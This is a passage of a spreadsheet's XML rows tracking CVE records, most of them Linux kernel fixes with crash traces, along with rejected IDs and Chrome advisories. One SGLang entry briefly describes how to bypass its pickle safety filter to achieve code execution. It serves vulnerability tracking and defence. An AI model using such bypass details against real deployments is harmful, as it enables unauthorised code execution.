~0, HC_LENGTH() truncates it to 0xff, and op_regs ends up 0xff bytes
past the page-aligned MMIO base, i.e. unaligned. The first access
through it, xhci_halt() -&gt; xhci_handshake() reading op_regs-&gt;status, is
then an unaligned readl() on device memory. arm64 faults on unaligned
device accesses, so instead of xhci_handshake() catching the all-ones
value and returning -ENODEV, setup oopses:
  xhci-pci-renesas 0005:08:00.0: Unable to change power state from D3cold to D0, device inaccessible
  xhci-pci-renesas 0005:08:00.0: xHCI Host Controller
  xhci-pci-renesas 0005:08:00.0: new USB bus registered, assigned bus number 1
  Unable to handle kernel paging request at virtual address ffff80030a770103
    ESR = 0x0000000096000021
    FSC = 0x21: alignment fault
  Internal error: Oops: 0000000096000021 [#1]  SMP
  pc : xhci_halt [xhci_hcd]
  Call trace:
   xhci_halt
   xhci_gen_setup
   xhci_pci_setup
   usb_add_hcd
   usb_hcd_pci_probe
   xhci_pci_common_probe
   xhci_pci_renesas_probe
This was hit with a Renesas uPD720201 that failed to power up ("Unable
to change power state from D3cold to D0, device inaccessible") yet still
reached the HCD probe path.
Read the capability register once, and if it reads back the all-ones
value (as xhci_handshake() and xhci_reset() already test for), abort
setup with -ENODEV before op_regs is derived from it. Reading it once
also avoids re-reading a register that may change under a concurrent
hot-removal.</t>
        </is>
      </c>
      <c r="M6104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80861</t>
        </is>
      </c>
    </row>
    <row r="6105">
      <c r="A6105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80878</t>
        </is>
      </c>
      <c r="C6105" s="5" t="inlineStr"/>
      <c r="D6105" s="5" t="inlineStr"/>
      <c r="E6105" s="5" t="inlineStr"/>
      <c r="F6105" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6105" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6105" s="5" t="inlineStr"/>
      <c r="I6105" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6105" s="5" t="inlineStr"/>
      <c r="K6105" s="5" t="inlineStr"/>
      <c r="L6105" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Fix leak of ungot volume
Fix afs_lookup_volume_rcu() so that it doesn't leak a dying volume if
afs_try_get_volume() fails.</t>
        </is>
      </c>
      <c r="M6105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80878</t>
        </is>
      </c>
    </row>
    <row r="6106">
      <c r="A6106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80915</t>
        </is>
      </c>
      <c r="C6106" s="5" t="inlineStr"/>
      <c r="D6106" s="5" t="inlineStr"/>
      <c r="E6106" s="5" t="inlineStr"/>
      <c r="F6106" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6106" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6106" s="5" t="inlineStr"/>
      <c r="I6106" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6106" s="5" t="inlineStr"/>
      <c r="K6106" s="5" t="inlineStr"/>
      <c r="L6106" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Fix DPT allocation paths.
Remove the fallback for VRAM to system memory, I tested it and that
doesn't work at all, only a black screen with pipe fault errors were
observed.
On systems with media GT, extra latency is added when accessing stolen
memory when the GT is in MC6. Since we additionally aren't counting how
much memory is used for stolen and we could in theory fill up the
entire stolen area with DPT's, avoid using stolen and only use the
default memory region.
Using stolen may also result in random system hangs under load.
(cherry picked from commit a196406a3831291598fe8e73245914f7acffdfe0)</t>
        </is>
      </c>
      <c r="M6106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80915</t>
        </is>
      </c>
    </row>
    <row r="6107">
      <c r="A6107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80916</t>
        </is>
      </c>
      <c r="C6107" s="5" t="inlineStr"/>
      <c r="D6107" s="5" t="inlineStr"/>
      <c r="E6107" s="5" t="inlineStr"/>
      <c r="F6107" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6107" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6107" s="5" t="inlineStr"/>
      <c r="I6107" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6107" s="5" t="inlineStr"/>
      <c r="K6107" s="5" t="inlineStr"/>
      <c r="L6107" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
kcov: fix data corruption and race conditions on PREEMPT_RT
syzbot is reporting KCOV state corruption on PREEMPT_RT kernels, for the
temporary storage used for saving/restoring remote KCOV state is currently
allocated as the per-CPU area.
On PREEMPT_RT kernels, softirq handlers run as preemptible task threads
(e.g., ksoftirqd). If a softirq context preempts a task running a remote
KCOV session, it safely saves the task's state into the per-CPU area.
However, if that softirq thread is subsequently preempted by a higher-
priority softirq thread on the same CPU, the second softirq will overwrite
the same per-CPU area, permanently destroying the original task's KCOV
state.
Fix this data corruption by moving the temporary storage from the per-CPU
area to the per-thread area. Since each softirq thread now owns its own
task context, nested softirq preemption no longer causes data overwrites.
Note that while the temporary storage is now on a per-thread basis, the
per-CPU kcov_percpu_data.lock must be retained, for we need to ensure that
kcov_remote_start() and kcov_remote_stop() operate atomically without
racing against asynchronous interrupts that manipulate the current task's
KCOV state.
It is likely that GFP_KERNEL allocation by vmalloc_node() in kcov_init()
has already called panic() before returning NULL, for there will be no
OOM-killable userspace processes when __init function of built-in module
runs. But this patch also fixes crashing the kernel when vmalloc_node()
in kcov_init() returned NULL, for kcov_init() left per-CPU irq_area == NULL
but kcov_remote_start() depends on per-CPU irq_area != NULL, resulting in
  (1) doing vmalloc() in kcov_remote_start() despite !in_task() context
  (2) out-of-array-bounds access if (1) succeeded but
      kcov-&gt;remote_size &lt; CONFIG_KCOV_IRQ_AREA_SIZE
  (3) always leak memory allocated by (1), eventually killing all
      OOM-killable userspace processes
problems.</t>
        </is>
      </c>
      <c r="M6107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80916</t>
        </is>
      </c>
    </row>
    <row r="6108">
      <c r="A6108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80917</t>
        </is>
      </c>
      <c r="C6108" s="5" t="inlineStr"/>
      <c r="D6108" s="5" t="inlineStr"/>
      <c r="E6108" s="5" t="inlineStr"/>
      <c r="F6108" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6108" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6108" s="5" t="inlineStr"/>
      <c r="I6108" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6108" s="5" t="inlineStr"/>
      <c r="K6108" s="5" t="inlineStr"/>
      <c r="L6108" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: host-generic: Fix NULL pointer dereference on 32-bit CAM systems
On 32-bit systems the config space is too large to ioremap in one go, so
pci_ecam_create() maps each bus segment separately and relies on the
-&gt;add_bus callback (pci_ecam_add_bus) to populate the per-bus mapping in
cfg-&gt;winp[]. pci_ecam_map_bus() then uses that mapping as the base for
every config access.
The generic ECAM ops (pci_generic_ecam_ops) already provide the -&gt;add_bus
and -&gt;remove_bus callbacks, but the CAM (legacy) ops in pci-host-generic.c
do not. As a result, on a 32-bit host using "pci-host-cam-generic" the
per-bus mapping is never set up and the first config read dereferences a
NULL base, crashing during bus enumeration:
 Unable to handle kernel NULL pointer dereference at virtual address 00000800
 Oops [#1]
 CPU: 0 PID: 1 Comm: swapper Not tainted 6.9.7+ #43
 Hardware name: Digilent Nexys-Video-A7 RV32 (DT)
 epc : pci_generic_config_read+0x40/0xb0
  ra : pci_generic_config_read+0x2c/0xb0
 [&lt;c038db9c&gt;] pci_generic_config_read+0x40/0xb0
 [&lt;c038da04&gt;] pci_bus_read_config_dword+0x50/0xb0
 [&lt;c0391e94&gt;] pci_bus_generic_read_dev_vendor_id+0x3c/0x1ec
 [&lt;c039245c&gt;] pci_scan_single_device+0xa4/0x11c
 [&lt;c0392570&gt;] pci_scan_slot+0x9c/0x23c
 [&lt;c039388c&gt;] pci_scan_child_bus_extend+0x58/0x2f4
 [&lt;c0393db0&gt;] pci_scan_root_bus_bridge+0x64/0xe8
 [&lt;c0393e54&gt;] pci_host_probe+0x20/0xc8
 [&lt;c03bc6f4&gt;] pci_host_common_probe+0x144/0x1e4
Fix this by giving the CAM ops the same -&gt;add_bus/-&gt;remove_bus callbacks.
Since pci_ecam_add_bus() and pci_ecam_remove_bus() are static to ecam.c,
move the CAM ops definition there as pci_generic_cam_ops (mirroring
pci_generic_ecam_ops) and export it for pci-host-generic.c to reference.
[mani: removed timestamp from log]</t>
        </is>
      </c>
      <c r="M6108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80917</t>
        </is>
      </c>
    </row>
    <row r="6109">
      <c r="A6109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80918</t>
        </is>
      </c>
      <c r="C6109" s="5" t="inlineStr"/>
      <c r="D6109" s="5" t="inlineStr"/>
      <c r="E6109" s="5" t="inlineStr"/>
      <c r="F6109" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6109" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6109" s="5" t="inlineStr"/>
      <c r="I6109" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6109" s="5" t="inlineStr"/>
      <c r="K6109" s="5" t="inlineStr"/>
      <c r="L6109" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: core: fix number/pointer type confusion on long items
When fetch_item() is called by hid_scan_report() on an item with
HID_ITEM_TAG_LONG, it stores a pointer to the item data in
item-&gt;data.longdata instead of storing a value directly in
item-&gt;data.{u8/u16/u32}.
When item_udata() or item_sdata() encounters such an item, it incorrectly
assumes that the item is in short format, and therefore returns the lower
part of a kernel pointer reinterpreted as a number.
When a HID device is connected whose descriptor contains a
HID_GLOBAL_ITEM_TAG_REPORT_SIZE encoded in long format with size=4, this
causes the lower half of a kernel pointer to be printed into dmesg as a
number, like this:
    hid (null): invalid report_size 107953555
To fix it, let item_udata() and item_sdata() verify that the item is in
short format.
Note that this bug only affects hid_scan_report(), while the main parsing
pass hid_parse_collections() will always bail out when encountering a long
item.
Sidenote: There are currently no users of data.longdata; maybe we should
just remove any parsing of long-format descriptors as a follow-up.</t>
        </is>
      </c>
      <c r="M6109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80918</t>
        </is>
      </c>
    </row>
    <row r="6110">
      <c r="A6110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80919</t>
        </is>
      </c>
      <c r="C6110" s="5" t="inlineStr"/>
      <c r="D6110" s="5" t="inlineStr"/>
      <c r="E6110" s="5" t="inlineStr"/>
      <c r="F6110" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6110" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6110" s="5" t="inlineStr"/>
      <c r="I6110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6110" s="5" t="inlineStr"/>
      <c r="K6110" s="5" t="inlineStr"/>
      <c r="L6110" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix recursive ww_mutex acquire in amdgpu_devcoredump_format
When dumping IB contents from a hung job, amdgpu_devcoredump_format()
acquired the VM root PD's reservation via amdgpu_vm_lock_by_pasid() and
then, for each IB, called amdgpu_bo_reserve() on the BO backing the IB.
Both reservations are reservation_ww_class_mutex objects and neither
used a ww_acquire_ctx, which trips lockdep:
  WARNING: possible recursive locking detected
  --------------------------------------------
  kworker/u128:0 is trying to acquire lock:
  ffff88838b16e1f0 (reservation_ww_class_mutex){+.+.}-{4:4},
    at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu]
  but task is already holding lock:
  ffff8882f82681f0 (reservation_ww_class_mutex){+.+.}-{4:4},
    at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu]
   Possible unsafe locking scenario:
         CPU0
         ----
    lock(reservation_ww_class_mutex);
    lock(reservation_ww_class_mutex);
   *** DEADLOCK ***
   May be due to missing lock nesting notation
  Workqueue: events_unbound amdgpu_devcoredump_deferred_work [amdgpu]
  Call Trace:
   __ww_mutex_lock.constprop.0
   ww_mutex_lock
   amdgpu_bo_reserve
   amdgpu_devcoredump_format+0x1594 [amdgpu]
   amdgpu_devcoredump_deferred_work+0xea [amdgpu]
The two reservations are on different BOs in the captured trace, so the
splat is a lockdep-correctness warning, not an observed deadlock. It
becomes a real self-deadlock whenever the IB BO shares its dma_resv with
the root PD (the always-valid case, see amdgpu_vm_is_bo_always_valid()):
amdgpu_bo_reserve(abo) re-acquires the same ww_mutex without a ticket
and blocks forever. With amdgpu.gpu_recovery=0 the timeout handler
refires every ~2 s and each invocation produces this splat, drowning the
kernel ring buffer.
Now that amdgpu_vm_lock_by_pasid() takes a drm_exec context, move the IB
dumping into a separate helper that locks the root PD and every IB BO
together in a single drm_exec ticket. DRM_EXEC_IGNORE_DUPLICATES handles
IB BOs that share a dma_resv (e.g. always-valid BOs, or two IBs backed
by the same BO). Every lock is now a top-level acquire under one
ww_acquire_ctx, so the recursive ww_mutex condition is gone, and the
per-IB amdgpu_bo_reserve()/amdgpu_bo_unref() dance -- including a BO
refcount leak on the amdgpu_bo_reserve() failure path -- is removed.
(cherry picked from commit d6bf4242731219ee08ce54c365631e395486651e)</t>
        </is>
      </c>
      <c r="M6110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80919</t>
        </is>
      </c>
    </row>
    <row r="6111">
      <c r="A6111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80920</t>
        </is>
      </c>
      <c r="C6111" s="5" t="inlineStr"/>
      <c r="D6111" s="5" t="inlineStr"/>
      <c r="E6111" s="5" t="inlineStr"/>
      <c r="F6111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6111" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6111" s="5" t="inlineStr"/>
      <c r="I6111" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6111" s="5" t="inlineStr"/>
      <c r="K6111" s="5" t="inlineStr"/>
      <c r="L6111" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring: defer eventfd signaling when queued from a wakeup handler
io_req_local_work_add() signals the CQ ring eventfd inline when it is the
one to push the first entry onto -&gt;work_list. For DEFER_TASKRUN rings that
add is frequently done from a waitqueue wakeup handler, where an
arbitrary waitqueue lock is held.
eventfd_signal_mask() only refuses to recurse when current-&gt;in_eventfd
is set, but that bit is set by eventfd_signal_mask() itself. If the wake
chain starts somewhere else, signal goes out inline and can feed back
into epoll.
Add IOU_F_TWQ_IN_WAKE, set it on the task_work add done from the three
waitqueue callbacks, and use it to force io_eventfd_signal() down the
existing call_rcu_hurry() deferral instead of signaling inline.</t>
        </is>
      </c>
      <c r="M6111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80920</t>
        </is>
      </c>
    </row>
    <row r="6112">
      <c r="A6112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80922</t>
        </is>
      </c>
      <c r="C6112" s="5" t="inlineStr"/>
      <c r="D6112" s="5" t="inlineStr"/>
      <c r="E6112" s="5" t="inlineStr"/>
      <c r="F6112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6112" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6112" s="5" t="inlineStr"/>
      <c r="I6112" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6112" s="5" t="inlineStr"/>
      <c r="K6112" s="5" t="inlineStr"/>
      <c r="L6112" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: qcom-rng - Allow zero as a random number
Zero is a valid random number and needs to be allowed.  Otherwise the
output is distinguishable from random.</t>
        </is>
      </c>
      <c r="M6112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80922</t>
        </is>
      </c>
    </row>
    <row r="6113">
      <c r="A6113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80923</t>
        </is>
      </c>
      <c r="C6113" s="5" t="inlineStr"/>
      <c r="D6113" s="5" t="inlineStr"/>
      <c r="E6113" s="5" t="inlineStr"/>
      <c r="F6113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6113" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6113" s="5" t="inlineStr"/>
      <c r="I6113" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6113" s="5" t="inlineStr"/>
      <c r="K6113" s="5" t="inlineStr"/>
      <c r="L6113" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xhci: dbgtty: Fix unregister on tty_register_driver() failure
If tty_register_driver() fails, it drops the reference, but fails to set
the global dbc_tty_driver to NULL, causing the unregister to be called
again when module exits.
On module unload dbc_tty_exit() only gates its cleanup on the driver
pointer being non-NULL, so it operates on the already-freed driver:
    module_init(xhci_hcd_init)
      xhci_hcd_init()
        xhci_dbc_init()                       [return value ignored]
          dbc_tty_init()
            tty_register_driver() fails
              tty_driver_kref_put()           -&gt; driver freed
              (dbc_tty_driver left dangling)
    ...
    module_exit(xhci_hcd_fini)
      xhci_hcd_fini()
        xhci_dbc_exit()
          dbc_tty_exit()
            if (dbc_tty_driver)               -&gt; true (dangling)
              tty_unregister_driver()         -&gt; use-after-free</t>
        </is>
      </c>
      <c r="M6113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80923</t>
        </is>
      </c>
    </row>
    <row r="6114">
      <c r="A6114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80925</t>
        </is>
      </c>
      <c r="C6114" s="5" t="inlineStr"/>
      <c r="D6114" s="5" t="inlineStr"/>
      <c r="E6114" s="5" t="inlineStr"/>
      <c r="F6114" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6114" s="5" t="inlineStr">
        <is>
          <t>linux kernel, f5</t>
        </is>
      </c>
      <c r="H6114" s="5" t="inlineStr"/>
      <c r="I6114" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6114" s="5" t="inlineStr"/>
      <c r="K6114" s="5" t="inlineStr"/>
      <c r="L6114" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vlan: fix skb_under_panic and races when toggling HW VLAN offload
Toggling hardware VLAN TX offload (NETIF_F_HW_VLAN_CTAG_TX or
NETIF_F_HW_VLAN_STAG_TX) on a lower device invokes vlan_transfer_features(),
which dynamically changed vlandev-&gt;hard_header_len.
This causes two issues:
1. Lockless TX paths (e.g. packet_snd in af_packet.c, ip6_finish_output2)
   read dev-&gt;hard_header_len without holding RTNL lock. Mutating
   hard_header_len dynamically under RTNL creates a data race where upper
   layers reserve insufficient headroom based on a stale hard_header_len,
   resulting in skb_under_panic when vlan_dev_hard_header() is called.
2. In addition, vlan_transfer_features() updated hard_header_len without
   updating header_ops, causing a mismatch between allocated headroom
   and header creation.
Always setting dev-&gt;hard_header_len = real_dev-&gt;hard_header_len and
dev-&gt;needed_headroom = real_dev-&gt;needed_headroom + VLAN_HLEN unconditionally
ensures:
- dev-&gt;hard_header_len remains 100% static and immutable at real_dev-&gt;hard_header_len,
  eliminating all dynamic runtime updates and data races on hard_header_len.
- Upper layers allocating skbs via LL_RESERVED_SPACE() will always reserve
  sufficient headroom for software VLAN tag insertion (real_dev-&gt;hard_header_len +
  real_dev-&gt;needed_headroom + VLAN_HLEN).
- vlandev inherits real_dev-&gt;needed_tailroom so underlying trailer/padding/ICV
  requirements are honored.
- AF_PACKET SOCK_RAW network header offsets remain correctly aligned at
  real_dev-&gt;hard_header_len.
- vlan_header_ops is used unconditionally.
Note to stable teams: Make sure to backport these commits:
e16e960d55a4 ("ipvlan: inherit needed_headroom and needed_tailroom from phy_dev")
cef51860becd ("macvlan: inherit needed_headroom and needed_tailroom from lowerdev")</t>
        </is>
      </c>
      <c r="M6114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80925</t>
        </is>
      </c>
    </row>
    <row r="6115">
      <c r="A6115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82455</t>
        </is>
      </c>
      <c r="C6115" s="5" t="inlineStr"/>
      <c r="D6115" s="5" t="inlineStr"/>
      <c r="E6115" s="5" t="inlineStr"/>
      <c r="F6115" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6115" s="5" t="inlineStr"/>
      <c r="H6115" s="5" t="inlineStr"/>
      <c r="I6115" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J6115" s="5" t="inlineStr"/>
      <c r="K6115" s="5" t="inlineStr"/>
      <c r="L6115" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: The RubyGems maintainers determined that the reported symlink-following behavior during gem extraction is not a security vulnerability, so no vulnerability exists for this record to describe.</t>
        </is>
      </c>
      <c r="M6115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82455</t>
        </is>
      </c>
    </row>
    <row r="6116">
      <c r="A6116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82514</t>
        </is>
      </c>
      <c r="C6116" s="5" t="inlineStr"/>
      <c r="D6116" s="5" t="inlineStr"/>
      <c r="E6116" s="5" t="inlineStr"/>
      <c r="F6116" s="5" t="inlineStr"/>
      <c r="G6116" s="5" t="inlineStr"/>
      <c r="H6116" s="5" t="inlineStr"/>
      <c r="I6116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6116" s="5" t="inlineStr"/>
      <c r="K6116" s="5" t="inlineStr"/>
      <c r="L6116" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82514</t>
        </is>
      </c>
    </row>
    <row r="6117">
      <c r="A6117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86477</t>
        </is>
      </c>
      <c r="C6117" s="5" t="inlineStr"/>
      <c r="D6117" s="5" t="inlineStr"/>
      <c r="E6117" s="5" t="inlineStr"/>
      <c r="F6117" s="5" t="inlineStr"/>
      <c r="G6117" s="5" t="inlineStr"/>
      <c r="H6117" s="5" t="inlineStr"/>
      <c r="I6117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6117" s="5" t="inlineStr"/>
      <c r="K6117" s="5" t="inlineStr"/>
      <c r="L6117" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.</t>
        </is>
      </c>
      <c r="M6117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86477</t>
        </is>
      </c>
    </row>
    <row r="6118">
      <c r="A6118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86793</t>
        </is>
      </c>
      <c r="C6118" s="5" t="inlineStr"/>
      <c r="D6118" s="5" t="inlineStr"/>
      <c r="E6118" s="5" t="inlineStr"/>
      <c r="F6118" s="5" t="inlineStr"/>
      <c r="G6118" s="5" t="inlineStr"/>
      <c r="H6118" s="5" t="inlineStr"/>
      <c r="I6118" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J6118" s="5" t="inlineStr"/>
      <c r="K6118" s="5" t="inlineStr"/>
      <c r="L6118" s="5" t="inlineStr">
        <is>
          <t>SGLang allows unauthenticated pickle deserialization through /update_weights_from_tensor when no auth keys are configured, and the SafeUnpickler policy can be bypassed because builtins.import and builtins.getattr are resolvable, enabling code execution via pickle REDUCE.</t>
        </is>
      </c>
      <c r="M6118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86793</t>
        </is>
      </c>
    </row>
    <row r="6119">
      <c r="A6119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87469</t>
        </is>
      </c>
      <c r="C6119" s="5" t="inlineStr"/>
      <c r="D6119" s="5" t="inlineStr"/>
      <c r="E6119" s="5" t="inlineStr"/>
      <c r="F6119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6119" s="5" t="inlineStr"/>
      <c r="H6119" s="5" t="inlineStr"/>
      <c r="I6119" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6119" s="5" t="inlineStr"/>
      <c r="K6119" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L6119" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy into a privileged page via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M6119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87469</t>
        </is>
      </c>
    </row>
    <row r="6120">
      <c r="A6120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87473</t>
        </is>
      </c>
      <c r="C6120" s="5" t="inlineStr"/>
      <c r="D6120" s="5" t="inlineStr"/>
      <c r="E6120" s="5" t="inlineStr"/>
      <c r="F6120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6120" s="5" t="inlineStr"/>
      <c r="H6120" s="5" t="inlineStr"/>
      <c r="I6120" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6120" s="5" t="inlineStr"/>
      <c r="K6120" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L6120" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileHandling in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M6120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87473</t>
        </is>
      </c>
    </row>
    <row r="6121">
      <c r="A6121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87511</t>
        </is>
      </c>
      <c r="C6121" s="5" t="inlineStr"/>
      <c r="D6121" s="5" t="inlineStr"/>
      <c r="E6121" s="5" t="inlineStr"/>
      <c r="F6121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6121" s="5" t="inlineStr"/>
      <c r="H6121" s="5" t="inlineStr"/>
      <c r="I6121" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6121" s="5" t="inlineStr"/>
